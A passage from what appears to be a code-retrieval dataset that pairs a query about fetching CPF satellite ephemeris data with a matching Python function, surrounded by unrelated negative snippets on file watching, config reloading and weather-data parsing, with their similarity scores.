open('files/' + file_name + '.json', 'w') as f:\n json.dump(r, f, indent=4)\n with open('files/' + file_name + '.txt', 'w') as f_: # update date\n f_.write(str(time.time()))", "def last_file_updated(self):\n query = '*.xml'\n keymap_files = glob.glob(query)\n\n sorted_files = sorted(keymap_files, key=self.mtime, reverse=1)\n last_modified_file = sorted_files[0]\n second_last_modified_file = sorted_files[1]\n\n t1 = self.mtime(last_modified_file)\n t2 = self.mtime(second_last_modified_file)\n\n logger.debug('Last modified time: {0}'.format(t1))\n logger.debug('Second Last modified time: {0}'.format(t2))\n\n last_modified_time = self.mtime(last_modified_file)\n last_access_time = self.atime(last_modified_file)\n\n if sys.platform == \"win32\":\n logger.info('Detected Windows environment')\n # self.regenerate_osx(last_access_time, last_modified_time)\n elif sys.platform == 'darwin':\n logger.info('Detected OSX environment')\n # self.regenerate_windows(last_access_time, last_modified_time)\n else:\n logger.error('Unhandled platform: {0}'.format(sys.platform))\n pass", "def run(updater: Updater):\n logger = getLogger()\n logger.info(\"Starting polling\")\n updater.start_polling()", "async def watchForFileSystemEvents(self):\n\n # Things that can throw this off:\n #\n # * Moving a watched directory out of the watch tree (will still\n # generate events even when outside of directory tree)\n #\n # * Doing two changes on a directory or something before the program\n # has a time to handle it (this will also throw off a lot of inotify\n # code, though)\n #\n # * Moving a watched directory within a watched directory will get the\n # wrong path. This needs to use the cookie system to link events\n # together and complete the move properly, which can still make some\n # events get the wrong path if you get file events during the move or\n # something silly like that, since MOVED_FROM and MOVED_TO aren't\n # guaranteed to be contiguous. That exercise is left up to the\n # reader.\n #\n # * Trying to watch a path that doesn't exist won't automatically\n # create it or anything of the sort.\n #\n # * Deleting and recreating or moving the watched directory won't do\n # anything special, but it probably should.\n #\n async for event in self.inotify:\n\n if not self.continueWatchingFS :\n return\n\n # If this is a creation event, add a watch for the new path (and its\n # subdirectories if any)\n #\n if Mask.CREATE in event.mask and event.path is not None :\n await self.watchAPath(event.path)\n\n if Mask.DELETE_SELF in event.mask and event.path is not None :\n await self.unWatchAPath(event.path, event.watch)\n\n # If there are some bits in the cpMask in the event.mask yield this\n # event\n #\n if event.mask & self.cpMask:\n yield event\n else:\n # Note that these events are needed for cleanup purposes.\n # We'll always get IGNORED events so the watch can be removed\n # from the inotify. We don't need to do anything with the\n # events, but they do need to be generated for cleanup.\n # We don't need to pass IGNORED events up, because the end-user\n # doesn't have the inotify instance anyway, and IGNORED is just\n # used for management purposes.\n #\n self.logger.debug(f'UNYIELDED EVENT: {event}')", "def parse_update(self, file):\n\n self.new_hashes = []\n self.old_hashes = []\n parsed = self.parse_header(file.readline())\n if parsed:\n (type, version) = parsed\n self.log.debug(\"Received list type: %s, version: %s\" % (type, version))\n pattern = re.compile(HASH_REGEX)\n for line in file:\n m = pattern.search(line)\n if m:\n if m.group(1) == \"+\":\n self.new_hashes.append(m.group(2))\n elif m.group(1) == \"-\":\n self.old_hashes.append(m.group(2))\n\n self._version = int(version)\n else:\n raise SafeBrowsingUpdateError(\"Received bad/empty list, no changes made\")", "def test_watch_graph_changes(self):\n self.make_files(foo='foo', bar='bar')\n with pike.Graph('g') as graph:\n pike.glob('.', '*')\n watcher = pike.watch_graph(graph)\n ret = watcher.run()\n self.assertItemsEqual([f.data.read() for f in ret['default']],\n [b'foo', b'bar'])\n self.make_files(foo='foo', bar='foo')\n ret = watcher.run()\n self.assertItemsEqual([f.data.read() for f in ret['default']],\n [b'foo', b'foo'])", "def _update_versions_watch(self, new_versions_list):\n if self._stopped:\n return False\n\n persistent_update_versions = retry_children_watch_coroutine(\n self.versions_node, self.update_versions\n )\n main_io_loop = IOLoop.instance()\n main_io_loop.add_callback(persistent_update_versions, new_versions_list)", "async def start_watching_roots(self):\n db.clear_visits(self.db_conn)\n for root in self.config.roots:\n await self.watch_tree(root)\n\n for path in db.get_unvisited_files(self.db_conn):\n print(path)\n await self.process_change(path, None)", "def test_inotify(self):\n self.fail(\"write a test\")", "def monitor(self, interval=15):\r\n self.old_files = {}\r\n while True:\r\n try:\r\n self.query()\r\n time.sleep(interval)\r\n print(\"scanning\")\r\n except KeyboardInterrupt:\r\n self.close()\r\n except:\r\n pass", "def modify_input_file(filepath, updated_file_list):\n lines = 0 # current input line number\n file_changed = False # the file has changed\n\n # find and change matching lines\n pattern = re.compile(\"[Cc]opyright\")\n with open(filepath, mode='r', encoding='utf-8', newline='') as file_in:\n for line in file_in:\n lines += 1\n if pattern.search(line) and __old_date in line:\n line = line.replace(__old_date, __new_date)\n file_changed = True\n updated_file_list.append(line)\n return file_changed", "async def update_specific_config(self, filename: str):\n self.general_logger.debug(f\"File {filename} has changed!\")\n try:\n with open(filename, \"r\") as f:\n j = json.load(f)\n except JSONDecodeError:\n self.general_logger.warning(\n f\"File {filename} has changed but contains invalid json data\"\n )\n return\n\n splits = filename.split(os.path.sep)\n commands = [] # List[Cmd]\n sock_paths = [] # type: List[str]\n\n # if it's from the monitors folder:\n if \"monitors\" in filename.split(os.path.sep):\n sockets = self.monitor_sockets\n elif \"scrapers\" in filename.split(os.path.sep):\n sockets = self.scraper_sockets\n else:\n self.general_logger.debug(\"File not useful.\")\n return\n\n # we are interested in configs, whitelists, blacklists, webhooks\n if splits[-1] == \"whitelists.json\":\n cmd = COMMANDS.SET_SPECIFIC_WHITELIST\n elif splits[-1] == \"configs.json\":\n cmd = COMMANDS.SET_SPECIFIC_CONFIG\n elif splits[-1] == \"blacklists.json\":\n cmd = COMMANDS.SET_SPECIFIC_BLACKLIST\n elif splits[-1] == \"webhooks.json\":\n cmd = COMMANDS.SET_SPECIFIC_WEBHOOKS\n else:\n return\n\n # for every monitor socket\n for name in sockets:\n if name in j:\n sock_path = sockets[name]\n c = Cmd()\n c.cmd = cmd\n # send only the corresponding part to the monitor\n c.payload = j[name]\n commands.append(c)\n sock_paths.append(sock_path)\n\n # prepare to make all the async requests\n tasks = []\n for sock_path, command in zip(sock_paths, commands):\n tasks.append(self.make_request(sock_path, command))\n\n # send the requests\n responses = await asyncio.gather(*tasks) # List[Response]\n\n for response in responses:\n if response.error.value:\n self.general_logger.warning(\n f\"Failed to update config: {response.error}\"\n )", "def listen(self):\n self.init_delete_batch_processing()\n self.init_file_batch_processing()\n self.init_symlink_batch_processing()\n\n self.loop.create_task(self.start_watching_roots())\n\n self.revisit_cond = asyncio.Condition()\n self.loop.create_task(self.start_polling_revisits())\n\n self.start_polling_changes()\n self.loop.run_forever()\n self.stop_polling_changes()", "def watch_assets(cli_config):\n commands = AssetsCommands(cli_config)\n commands.watch_assets()", "def on_watch(self, payload):\n pass", "def file_last_updated(self, file_last_updated):\n\n self._file_last_updated = file_last_updated", "def _watch(self):\n # self._popen.wait()\n lines_iterator = iter(self._popen.stdout.readline, b\"\")\n for line in lines_iterator:\n line = line.strip()\n # log.log(\"raw\",self.name.upper()+\" SAYS: \"+line)\n # cmd = line.split(' ')[0]\n # args = line.split(' ')[1:]\n if line[0] == '#':\n self.onEvent(line.split(' '))\n if self.onClose:\n self.onEvent([self.onClose])\n self._running.clear()\n if self.stderr is not None:\n self.stderr.close()", "def canReloadWithChange(self, externalFilePath):\n return False", "def file_stat(self, file_path):", "def watch(cfg, keyword):\n try:\n watch_coverage(keyword, cfg)\n except IOError: # broken pipe, for example\n pass", "def start(self):\n self._class_setup()\n\n self._inotify_fd = InotifyFileWatcher._libc.inotify_init()\n if self._inotify_fd < 0:\n error = OSError('failed call to inotify_init')\n error.errno = ctypes.get_errno()\n error.strerror = errno.errorcode[ctypes.get_errno()]\n raise error\n self._inotify_poll = select.poll()\n self._inotify_poll.register(self._inotify_fd, select.POLLIN)\n self._add_watch_for_path(self._directory)", "def on_modified(self, event):\n path = Path(event.src_path)\n if path.is_file() and path.suffix == '.json':\n self.load_configuration(path)\n self.hook(self.configuration)", "def updateFileList(self, fileList):\n\n if fileList == self.fileList:\n return 0\n\n self.mutex.acquire()\n # init = time.time()\n # \n # while(self.bussy):\n # sleep(0.1)\n # if time.time() - init > 2*self.period:\n # return 0\n \n self.fileList = fileList\n self.mutex.release()\n return 1", "def run(self):\n # for running indefinitely if 'watch' is passed\n if self._arguments.watch:\n while True:\n self.watch(self.main(), int(self._arguments.watch))\n else:\n self.main()", "async def start_polling_revisits(self):\n while True:\n now = time.time()\n next_revisit_time, revisit_paths = db.due_for_revisit(self.db_conn, now)\n self.log(\n \"Next revisit time: {} ({}s), due now: {}\".format(\n next_revisit_time,\n (next_revisit_time or now) - now,\n len(revisit_paths),\n )\n )\n\n for path in revisit_paths:\n try:\n stats = os.stat(path, follow_symlinks=False)\n except FileNotFoundError:\n stats = None\n await self.process_change(path, stats)\n else:\n if next_revisit_time is None:\n async with self.revisit_cond:\n await self.revisit_cond.wait()\n else:\n await asyncio.sleep(1)", "def refresh(self):\n self.update_from_file()\n self.update_from_env()", "def test_verify_changed_source_file_adjust_mtime(self):\n\n # Get the atime and mtime of the file\n file_info = os.stat('testfiles/various_file_types/executable')\n\n # Set the atime and mtime of the file to the time that we collected, as on some systems\n # the times from a stat call don't match what a utime will set.\n os.utime('testfiles/various_file_types/executable', (file_info.st_atime, file_info.st_mtime))\n\n self.backup(u\"full\", u\"testfiles/various_file_types\", options=[])\n\n # Edit source file\n with open('testfiles/various_file_types/executable', 'r+') as f:\n f.write('This changes a source file.')\n\n # Set the atime and mtime for the file back to what it was prior to the edit\n os.utime('testfiles/various_file_types/executable', (file_info.st_atime, file_info.st_mtime))\n\n # Test verify for the file\n self.verify(u'testfiles/various_file_types/executable', file_to_verify=u'executable', options=[])", "def update( ):\r\n pass", "def check_auto_update(self):\n\n # pylint: disable=W0201\n\n if self.filename is None:\n return\n try:\n filename = self.filename\n timestamp = os.stat(self.filename).st_mtime\n if self.timestamp is None or self.timestamp < timestamp:\n logger.debug(\"Updating %s, timestamp %s\",\n filename, rpki.sundial.datetime.fromtimestamp(timestamp))\n f = open(filename, \"rb\")\n value = f.read()\n f.close()\n self.clear()\n if looks_like_PEM(value):\n self._set_PEM(value)\n else:\n self.DER = value\n self.filename = filename\n self.timestamp = timestamp\n except (IOError, OSError), e:\n now = rpki.sundial.now()\n if self.lastfail is None or now > self.lastfail + self.failure_threshold:\n logger.warning(\"Could not auto_update %r (last failure %s): %s\", self, self.lastfail, e)\n self.lastfail = now\n else:\n self.lastfail = None", "def _touch_file(self, fname):\n if os.path.exists(fname):\n os.utime(fname, None)\n else:\n open(fname, 'a').close()", "def update_freq_dist(filename):\r\n pass", "def _touch_file(self, file_id):\n if file_id in self.touch_list:\n self.touch_list.remove(file_id)\n self.touch_list.append(file_id)", "def do_touch ( self, fspath ):\n return", "def check_for_updates():\n last_version = str(request.urlopen(__source__).read().decode(\"utf8\"))\n if str(open(__file__).read()) != last_version:\n log.warning(\"Theres new Version available!, Update from \" + __source__)\n else:\n log.info(\"No new updates!,You have the lastest version of this app.\")", "def update(self):\n if self._refreshed_at is None or (\n self._refreshed_at + self._refresh_rate <= datetime.datetime.now()):\n\n self.run()", "def update():", "def update():", "def on_change(self, event):\n event_path = event.src_path\n observed_paths = []\n\n for watchdog_path, child_observed_paths in self._watch_dog_observed_paths.items():\n if event_path.startswith(watchdog_path):\n observed_paths += child_observed_paths\n\n if not observed_paths:\n return\n\n changed_paths = []\n for path in observed_paths:\n path_obj = Path(path)\n # The path got deleted\n if not path_obj.exists():\n self._observed_paths.pop(path, None)\n changed_paths += [path]\n else:\n new_checksum = calculate_checksum(path)\n if new_checksum != self._observed_paths.get(path, None):\n changed_paths += [path]\n self._observed_paths[path] = new_checksum\n if changed_paths:\n self._input_on_change(changed_paths)", "def watch_logfile(self, logfile_path):\r\n self._run_stats['logSource'] = logfile_path\r\n log_parser = LogParser()\r\n\r\n # For each new line in the logfile ...\r\n output_time = time.time() + WATCH_DISPLAY_REFRESH_SECONDS\r\n try:\r\n firstLine = True\r\n for line in self._tail_file(open(logfile_path),\r\n WATCH_INTERVAL_SECONDS):\r\n if firstLine:\r\n self._run_stats['timeRange']['start'] = get_line_time(line)\r\n self._process_query(line, log_parser)\r\n self._run_stats['timeRange']['end'] = get_line_time(line)\r\n if time.time() >= output_time:\r\n self._output_aggregated_report(sys.stderr)\r\n output_time = time.time() + WATCH_DISPLAY_REFRESH_SECONDS\r\n except KeyboardInterrupt:\r\n sys.stderr.write(\"Interrupt received\\n\")\r\n finally:\r\n self._output_aggregated_report(sys.stdout)\r\n\r\n return 0", "def request_changes(self):\n self._check_if_open()\n data = {\"request-changes\": True}\n return self.post(\"request-changes\", data)", "def update(self):\n try:\n lines = self.get_latest_lines()\n except Exception:\n logger.warning(\"No such logfile: {}\".format(self.filename))\n for pattern, callback in self.patterns:\n for line in lines:\n if re.search(pattern, line):\n callback(pattern, line, lines, self.filename)", "def status_watcher(cs, line):\n #print('status watcher watching')\n\n # from the mullvad code, should watch for\n # things like:\n # \"Initialization Sequence Completed\"\n # \"With Errors\"\n # \"Tap-Win32\"\n\n if \"Completed\" in line:\n cs.change_to(cs.CONNECTED)\n return\n\n if \"Initial packet from\" in line:\n cs.change_to(cs.CONNECTING)\n return", "def deep_watch(self, d: Path) -> None:\n dir_links = [_ for _ in all_subdirs(d) if is_link_to_dir(_)]\n\n for watch_path in [d, *dir_links]:\n self.add_watch(\n str(watch_path),\n pyinotify.ALL_EVENTS,\n rec=True,\n )", "def process_multiple_files(file_path):\n log.debug(\"Process {} is Compressing {}.\".format(os.getpid(), file_path))\n if args.watch:\n previous = int(os.stat(file_path).st_mtime)\n log.info(\"Process {} is Watching {}.\".format(os.getpid(), file_path))\n while True:\n actual = int(os.stat(file_path).st_mtime)\n if previous == actual:\n sleep(60)\n else:\n previous = actual\n log.debug(\"Modification detected on {0}.\".format(file_path))\n check_working_folder(os.path.dirname(file_path))\n if file_path.endswith(\".css\"):\n process_single_css_file(file_path)\n elif file_path.endswith(\".js\"):\n process_single_js_file(file_path)\n else:\n process_single_html_file(file_path)\n else:\n if file_path.endswith(\".css\"):\n process_single_css_file(file_path)\n elif file_path.endswith(\".js\"):\n process_single_js_file(file_path)\n else:\n process_single_html_file(file_path)", "def monitor(self, seconds=1):\r\n\r\n for ts in range(0, seconds):\r\n self.listenFiles = self.listen_files_list(self.listenDir)\r\n FoI = list(set(self.listenFiles)-set(self.logFiles))\r\n if len(FoI) == 0:\r\n time.sleep(1)\r\n else:\r\n self.CHANGE_appendAll() # Can be probamatic for first iter..\r\n return True\r\n\r\n return False", "def autoBuildTick (self, event = None):\r\n for pathname, oldmtime in self.autobuildfiles.iteritems():\r\n newmtime = os.stat(pathname).st_mtime\r\n if newmtime != oldmtime:\r\n #print \"Auto rebuild triggered by: \", pathname\r\n self.autobuildfiles[pathname] = newmtime\r\n self.rebuild()\r\n break", "def update(file: Path, validate_assets: bool, external_url: str) -> None:\n\n mutate(file, validate_assets, external_url, upsert=False)", "def watch_file(self, target=None, wait_time=0.1):\n import time\n import signal\n\n def _signal_handler(*args):\n \"\"\"Handle quit signal for plot watching\"\"\"\n self._user_exit = True\n\n signal.signal(signal.SIGINT, _signal_handler)\n pat_builtin = [grep(*x) for x in self._init_builtins()]\n patterns = pat_builtin + self._user_rules\n with open(self.logfile) as fh:\n while (not self.solve_completed) and (not self._user_exit):\n line = fh.readline()\n if not line:\n time.sleep(wait_time)\n elif line.strip():\n for pat in patterns:\n pat.send(line)\n if self._tick and target is not None:\n target.send(self.solve_completed)\n self._tick = False\n if self.solve_completed:\n self._save_state()\n return self._user_exit", "def file_is_modified(filename, lastupdate):\n now = datetime.datetime.utcnow()\n update = file_get_mdatetime(filename)\n return now >= update and update >= lastupdate" ]
[ "0.7057741", "0.68224883", "0.6613068", "0.6612686", "0.65972984", "0.6454981", "0.6450486", "0.6387383", "0.6343412", "0.62934804", "0.6246352", "0.6237782", "0.6216912", "0.6172237", "0.6156002", "0.615293", "0.615024", "0.61491203", "0.61296344", "0.60973674", "0.6014658", "0.60033166", "0.5986758", "0.59192216", "0.5913521", "0.58928555", "0.58895975", "0.5862081", "0.58561414", "0.5847171", "0.58310765", "0.58228505", "0.5819676", "0.5763927", "0.5749769", "0.57307756", "0.5721072", "0.56807274", "0.5656964", "0.5654647", "0.56421435", "0.5518527", "0.5505666", "0.55053943", "0.5504085", "0.5490783", "0.5440263", "0.5438857", "0.54350436", "0.5433892", "0.5422736", "0.54211706", "0.54033065", "0.53984183", "0.5396671", "0.5388692", "0.5385173", "0.53820187", "0.5373532", "0.53445876", "0.533978", "0.5327272", "0.53214616", "0.5310458", "0.5308208", "0.5307285", "0.5298465", "0.52928656", "0.5283235", "0.52714324", "0.5268361", "0.52484936", "0.52451015", "0.5235626", "0.52295756", "0.52248347", "0.5221555", "0.521962", "0.52184796", "0.5212345", "0.52080023", "0.51978606", "0.5196855", "0.5185014", "0.51687783", "0.5157211", "0.51446736", "0.51446736", "0.5140161", "0.5139321", "0.51370776", "0.5134819", "0.5131411", "0.51180136", "0.51070845", "0.5097455", "0.50961614", "0.5093382", "0.5092745", "0.50868744" ]
0.5519304
41
Get CPF data for a given date The ephemeris data is stored in a dictionary with tables of times and position under the "positions" key. This table is interpolated in the calculate_initial_values method.
def get_ephemeris(rundate, sat_name): file_key = "slr_ephemeris" ephemeris_data = get_satellite_vars(sat_name) provider_list = config.tech.prediction_providers.list # Find the latest version of the observation file versions = config.files.glob_variable(file_key, "version", r"\d+", file_vars=ephemeris_data) try: ephemeris_data["version"] = sorted(versions)[-1] providers = config.files.glob_variable(file_key, "provider", r"\w+", file_vars=ephemeris_data) for provider in provider_list: if provider in providers: ephemeris_data["provider"] = provider break else: log.fatal(f"No valid provider found: {', '.join(providers)}") except IndexError: log.info("No ephemeris data found") log.info(f"Download manually from https://cddis.nasa.gov/archive/slr/cpf_predicts/{rundate.year}/{sat_name}") log.fatal(f"Please save missing file as '{config.files.path(file_key)}' !") eph_parser = parsers.parse_key(file_key, file_vars=ephemeris_data) eph = calculate_initial_values(eph_parser.as_dict(), rundate) return eph
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def calculate_initial_values(eph, rundate):\n data = sorted(eph[\"positions\"].items())\n pos_itrs = np.zeros((len(data), 3))\n mjd1, mjd2 = zip(*[t for t, d in data])\n rotation_mat = rotation.trs2gcrs(time.Time(val=mjd1, val2=mjd2, fmt=\"mjd\", scale=\"utc\"))\n tbl = time.Time(val=mjd1, val2=mjd2, fmt=\"mjd\", scale=\"utc\")\n\n for i in range(0, len(data)):\n pos_itrs[i] = data[i][1][\"pos\"]\n\n diffsec = np.array([(t - rundate).total_seconds() for t in tbl.utc.datetime])\n\n # Table given in ITRF coordinate system. Convert to GCRS, where the integration of the satellite orbit will\n # be done\n\n pos_gcrs = np.sum(rotation_mat @ pos_itrs[:, :, None], axis=2)\n log.info(\"Interpolating data from prediction file in order to get initial pos/vel\")\n pos_gcrs_ip, vel_gcrs_ip = interpolation.interpolate_with_derivative(\n diffsec, pos_gcrs, np.array([0.0]), kind=\"lagrange\", window=10, bounds_error=False\n )\n eph[\"initial_pos\"] = pos_gcrs_ip[0]\n eph[\"initial_vel\"] = vel_gcrs_ip[0]\n\n return eph", "def get_data_date(self, date):\n data = {}\n for stock in self.stocks:\n data[stock] = self.stock_data[stock].to_stock_dataframe_day(date)\n return data", "def readProcessedFCD():\n procFcdDict = {}\n pqDateDict = {} # each date is a period / quota tupel assigned\n simDate = '2007-07-18 '\n day = 0\n # create keys for the procFcdDict\n for p in period:\n for q in quota:\n day += 86400\n date, time = calcTime.getDateFromDepart(day).split(\" \")\n pqDateDict.setdefault(date, (p, q))\n procFcdDict.setdefault((p, q), {})\n # print date,p,q\n\n inputFile = open(path.FQprocessedFCD, 'r')\n for line in inputFile:\n timestamp, edge, speed, cover, id = line.split('\\t')\n date, time = calcTime.getNiceTimeLabel(timestamp).split(\" \")\n # add values to actual Dict\n timestep = calcTime.getTimeInSecs(simDate + time)\n procFcdDict[pqDateDict[date]].setdefault(\n timestep, []).append((id, edge, float(speed) / 3.6))\n inputFile.close()\n\n return procFcdDict", "def getBlpData(date, mode='production'):\n\tgetBlpDataFile = lambda date, mode: \\\n\t\tjoin(getInputDirectory(mode), 'BlpData_' + date + '.xlsx')\n\n\n\treturn \\\n\tcompose(\n\t\tdict\n\t , partial(map, lambda p: (p['ID'], p))\n\t , getRawPositionsFromFile\n\t , getBlpDataFile\n\t)(date, mode)", "def get_cdf_data(self):\n df = self.df_events.copy()\n df['event_time'] = df['event_time'].apply(self.parse_time_stamp) # convert strings to datetime objects\n # only get the rows with event_type_reason == \"user_pick_up\" and event_time between 6 am and 10 pm\n # also make sure dates are between the start and end period\n df = df[(df['event_type_reason'] == \"user_pick_up\") & (df['event_time'] >= iso8601.parse_date(self.start)) & (df['event_time'] <= iso8601.parse_date(self.end))]\n df['date'] = df['event_time'].apply(self.get_date).astype(str) # get date part of datetime object\n df['minute'] = df['event_time'].apply(self.get_minutes).astype(float)\n # consider only trips that began with operating hours\n df = df[(df['minute'] >= (6*60)) & (df['minute'] < (22*60))]\n return df[['date', 'minute']].reset_index(drop=True)", "def interpolate_ephemeris(self):\n #Compute the offsets into the lookup tables\n startemiss, stopemiss = self.get_emissivity_offsets()\n hourslice, starttime = self.get_hour_offsets()\n latslice = self.get_lat_offsets()\n \n #Compute the start and stop dates\n startdata = self.extract_season(self.startseason,startemiss,\n hourslice, latslice)\n stopdata = self.extract_season(self.stopseason,startemiss,\n hourslice, latslice)\n # Interpolate Season\n seasons = [self.startseason, self.stopseason]\n season_f = compute_interpolation_function(seasons, [startdata, stopdata], 'linear')\n data = season_f(self.season)\n #Interpolate time\n self.data = self.interpolatehour(hourslice, starttime, data)", "def ec_data_processor_precip(path, x='TIMESTAMP_END', y='LE', daily=True):\n\n\n # Get the data from the path and turn the path into a data frame\n # ec_dataset = pd.read_csv(path, header=2)\n\n ec_dataset = pd.read_csv(path, header=2, engine='python')\n\n # print ec_dataset.head()\n print ec_dataset['LE'].head()\n print ec_dataset[ec_dataset[y] != -9999].head()\n # === get rid of no data values in any category of the energy balance ===\n precip_dataset = ec_dataset[ec_dataset['P'] != -9999]\n ec_dataset = ec_dataset[ec_dataset[y] != -9999]\n ec_dataset = ec_dataset[ec_dataset['NETRAD'] != -9999]\n ec_dataset = ec_dataset[ec_dataset['H'] != -9999]\n ec_dataset = ec_dataset[ec_dataset['LE'] != -9999]\n # # You probably won't need these because Marcy Doesn't think they are valid for her towers\n # ec_dataset = ec_dataset[ec_dataset['SH'] != -9999]\n # ec_dataset = ec_dataset[ec_dataset['SLE'] != -9999]\n\n if x.startswith(\"TIMESTAMP\"):\n a = ec_dataset[x].apply(lambda b: dt.strptime(str(b), '%Y%m%d%H%M'))\n aa = precip_dataset[x].apply(lambda d: dt.strptime(str(d), '%Y%m%d%H%M'))\n\n # # TODO - if converting PRISM to MTN time.\n # # Convert to PRISM time (Mtn Standard + 5 hours) PRISM midnight is 12:00 UTC - 7 hours for mountain. Net +5 hrs\n # a = [i + timedelta(hours=19) for i in a]\n # aa = [i + timedelta(hours=19) for i in aa]\n\n\n else:\n a = ec_dataset[x]\n\n # ===== Time Series Processing =====\n\n timeseries = a\n p_timeseries = aa\n # print 'timeseries\\n', timeseries\n Rn = ec_dataset['NETRAD'].values\n H = ec_dataset['H'].values\n LE = ec_dataset['LE'].values\n P = precip_dataset['P']\n print 'P \\n', P\n # indexed_datetimes = pd.DataFrame(pd.DatetimeIndex(timeseries))\n\n # # testing\n # plt.plot(timeseries, P, color='black')\n # plt.show()\n\n # recreate a dataframe of the variables you want to time average on a monthly timestep\n halfhour_data = pd.DataFrame({'timeseries': timeseries, 'Rn': Rn, 'LE': LE, 'H': H}) # took out precip. no good vals? 'P': P\n\n halfhour_precip = pd.DataFrame({'timeseries': p_timeseries, 'P': P})\n # set the timeseries column to the index so groupby function can group by year and month of the index.\n halfhour_data = halfhour_data.set_index(pd.DatetimeIndex(halfhour_data['timeseries']))\n halfhour_precip = halfhour_precip.set_index(pd.DatetimeIndex(halfhour_precip['timeseries']))\n # convert latent heat to mmH2O by dividing by latent heat of vaporization.\n halfhour_data['mmh20'] = halfhour_data['LE'] * 7.962e-4\n\n if daily:\n\n daily_cum_data = halfhour_data.groupby([lambda x: x.year, lambda x: x.month, lambda x: x.day]).sum()\n daily_cum_precip = halfhour_precip.groupby([lambda x: x.year, lambda x: x.month, lambda x: x.day]).sum()\n\n # get each day in the timeseries. there are duplicates from the groupby function, so use set() to get rid of\n # duplicates\n daily_cum_time = daily_time_parse(timeseries)\n daily_cum_precip_time = daily_time_parse(p_timeseries)\n\n # # testing\n # daily_cum_data.to_csv('/Users/dcadol/Desktop/daily_cumulative_df.csv')\n\n # format daily_cum_data to have datetimes\n daily_cum_data['date'] = daily_cum_time\n daily_cum_precip['date'] = daily_cum_precip_time\n\n return daily_cum_data, daily_cum_precip", "def precipitation():\n # * Convert the query results to a Dictionary using `date` as the key and `prcp` as the value.\n session = Session(engine)\n results = session.query(Measurement.date, Measurement.prcp).all()\n session.close()\n all_precips = []\n for date, prcp in results:\n precip_dict = {}\n precip_dict[\"date\"] = date\n precip_dict[\"prcp\"] = prcp\n all_precips.append(precip_dict)\n\n # * Return the JSON representation of your dictionary.\n return jsonify(all_precips)", "def GetIscEventcatalog(start_date_time, days, pos, catalog_type):\n # Read the isc data. Note that we take any data points within 1000 km, which\n # is a huge distance. We let the polygon distance calculation below pull it\n # in closer.\n data = isc.ReadISCData('gs://clouddfe-cfs/isc', catalog_type, start_date_time,\n days, pos, 1000)\n\n # Munge the data. Brendan's calculations have different field names from\n # what's returned from the ISC reader. Likely we want to remove this step.\n # TODO(jfaller, meadeb): Make field names consistent.\n ret = {}\n ret['yr'] = [x['date_time'].year for x in data]\n ret['mon'] = [x['date_time'].month for x in data]\n ret['day'] = [x['date_time'].day for x in data]\n ret['hr'] = [x['date_time'].hour for x in data]\n ret['min'] = [x['date_time'].minute for x in data]\n ret['sec'] = [x['date_time'].second for x in data]\n ret['latitude'] = [x['lat'] for x in data]\n ret['longitude'] = [x['lon'] for x in data]\n ret['depth'] = [x['depth'] for x in data]\n ret['magnitude'] = [x['magnitude'] for x in data]\n ret['datetime'] = [x['date_time'] for x in data]\n\n return ret", "def getAllPositions(date, mode='production'):\n\treturn \\\n\tchain(\n\t\tgetGenevaPositions('19437', date, mode)\n\t , filterfalse( lambda p: getBlpPortfolioId(p).startswith('19437')\n\t \t\t\t , getAllPositionsBlp(date, mode)\n\t \t\t\t )\n\t)", "def readClimatePointEntries(context):\n return GenericMetadata._readEntriesForSection(context.projectDir, GenericMetadata.CLIMATE_POINT_SECTION)", "def getHourlyPrecip(self, keyword):\n\t\tweather_data = self.getHourlyWeatherFromCSV(keyword, \"f\", \"precipitation\")\n\t\tprecip_values = [] # Array that will contain all the precipitation data\n\t\tprecip_data = {} # Dictionary of precipitation data\n\n\t\t# Getting precipiation data\n\t\tfor data in weather_data:\n\t\t\tprecip_data[\"x\"] = self.helper.getDateInEpoch(data[\"date\"])\n\t\t\tprecip_data[\"y\"] = float(data[\"precipitation\"][:-1])/100\n\t\t\tprecip_values.append(precip_data)\n\t\t\tprecip_data = {}\n\n\t\treturn precip_values", "def gettrack_codar(jdmat_m,lon_vel,lat_vel,u,v,startdate,numdays,daystep,la,lo):\n # calculate the points near la,la\n distance,index_location=nearxy(lon_vel,lat_vel,lo,la)\n \n ####### get index of startdate in jdmat_m#####\n jdmat_m_num=[] # this is the date in the form of a number\n jdmat_m_list,jdmat=[],[]\n # convert array to list\n for jdmat_m_i in jdmat_m:\n jdmat_m_list.append(jdmat_m_i)\n for i in jdmat_m_list: # convert time to number\n jdmat_m_num.append(i)\n dts=date2num(datetime.datetime(2001,1,1,0,0,0))\n jdmat_m=[i+dts for i in jdmat_m]\n index_startdate=int(round(np.interp(startdate,jdmat_m,range(len(jdmat_m)))))#get the index of startdate\n # get u,v\n u1=float(u[index_startdate][index_location])\n v1=float(v[index_startdate][index_location])\n if u1==-999.0/100:# case of no good data\n u1=0\n v1=0\n nsteps=scipy.floor(min(numdays,jdmat_m_num[-1])/daystep)\n # get the velocity data at this first time & place\n lat_k='lat'+str(1)\n lon_k='lon'+str(1)\n uu,vv,lon_k,lat_k,time=[],[],[],[],[]\n uu.append(u1)\n vv.append(v1)\n lat_k.append(la)\n lon_k.append(lo)\n time.append(startdate)\n \n for i in range(1,int(nsteps)):\n # first, estimate the particle move to its new position using velocity of previous time steps\n lat1=lat_k[i-1]+float(vv[i-1]*daystep*24*3600)/1000/1.8535/60\n lon1=lon_k[i-1]+float(uu[i-1]*daystep*24*3600)/1000/1.8535/60*(scipy.cos(float(lat_k[i-1]))/180*np.pi)\n # find the closest model time for the new timestep\n jdmat_m_num_i=time[i-1]+daystep\n time.append(jdmat_m_num_i)\n #print jdmat_m_num_i\n\n index_startdate=int(round(np.interp(jdmat_m_num_i,jdmat_m_num,range(len(jdmat_m_num)))))\n #find the point's index of near lat1,lon1\n index_location=nearxy(lon_vel,lat_vel,lon1,lat1)[1]\n ui=u[index_startdate][index_location]\n vi=v[index_startdate][index_location]\n #if u1<>-999.0/100:# case of good data\n vv.append(vi)\n uu.append(ui)\n # estimate the particle move from its new position using velocity of previous time steps\n lat_k.append(float(lat1+lat_k[i-1]+float(vv[i]*daystep*24*3600)/1000/1.8535/60)/2)\n lon_k.append(float(lon1+lon_k[i-1]+float(uu[i]*daystep*24*3600)/1000/1.8535/60*scipy.cos(float(lat_k[i])/180*np.pi))/2)\n #else:\n # vv.append(0)\n # uu.append(0)\n # estimate the particle move from its new position using velocity of previous time steps\n # lat_k.append(float(lat1))\n # lon_k.append(float(lon1)) \n return lat_k,lon_k,time", "def _get_positions(self):\n pos_url = self.pos_url % (self.date, self.instrument, self.exchange)\n self.positions = 